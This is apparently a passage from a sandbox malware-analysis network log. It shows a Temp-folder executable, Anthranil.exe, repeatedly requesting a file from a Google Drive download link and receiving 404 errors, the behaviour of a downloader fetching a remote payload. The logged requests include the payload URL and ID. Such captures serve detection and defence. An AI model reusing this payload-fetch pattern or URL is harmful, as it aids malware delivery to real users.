    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:35 GMT
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-aXNXIr4DnQiNWYCr3ejh7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2025-01-11 04:29:35 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="t0H4p_VRh0iYsKVGsu_V0A">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49235 | 216.58.206.46 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:36 UTC | 422 | OUT | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:29:36 UTC | 1920 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:36 GMT
    Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-y87uOTxrQrPw06iqEvMTEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49243 | 142.250.185.129 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:37 UTC | 464 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:29:37 UTC | 1851 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFIdbgTZdeheKZn9JVpZuacOi6ApEAGnQOQGB0gK8y9XyaH5NkKrKYsmI5h_vm5TG_rcdgXTSii4tGg
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:37 GMT
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-ngv22eOXnR0dwv_YGuvWuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2025-01-11 04:29:37 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vDf0HicfIQg00sw7tuxu0w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  6 | 192.168.2.4 | 49251 | 216.58.206.46 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:29:38 UTC | 422 | OUT | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:39 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:38 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-K05MBg2FieZGKti8bAYqLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  7 | 192.168.2.4 | 49260 | 142.250.185.129 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:29:39 UTC | 464 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:40 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgQyxB9-iB40u7xrRo_i8LHwzV7razK3VC4IJhk7L9XqBSadW9jYGCJqeFUofnNPSDnqFQ-iMQM
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:40 GMT
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-tcqYqqwChqFINUHZo3dYOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:40 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 65 39 77 31 74 45 4d 70 44 70 62 43 55 72 4c 75 51 61 33 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Je9w1tEMpDpbCUrLuQa3GA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  8 | 192.168.2.4 | 49268 | 216.58.206.46 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:29:41 UTC | 422 | OUT | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:41 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:41 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: script-src 'nonce-FVcsj5t5GVe6q_OBNCUIGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  9 | 192.168.2.4 | 49276 | 142.250.185.129 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:29:42 UTC | 464 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:42 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgT8zNwOpOZgE9eOuW7XP3yy5L6Y7NFcyKxKAd1nJKL_EmSex-Plm-rFbF1E2LQU9zeJ
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:42 GMT
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-JN5pSnM8jJiEbYm1SGdy6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:42 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 59 77 62 4c 31 54 4c 45 44 5a 4f 59 61 4b 78 6b 46 64 7a 46 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GYwbL1TLEDZOYaKxkFdzFw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  10 | 192.168.2.4 | 49283 | 216.58.206.46 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:29:43 UTC | 422 | OUT | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:43 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:43 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: script-src 'nonce-1LPXZ8N10u6pEpeNPQFr-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  11 | 192.168.2.4 | 49289 | 142.250.185.129 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2025-01-11 04:29:44 UTC | 464 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:44 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgQ3yQOrHQMalSwG_0AIfhTxgG81HYZADqgy2dDO4AfOELtZVX21LHohl1INOqm5E3eE_RAy7eE
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
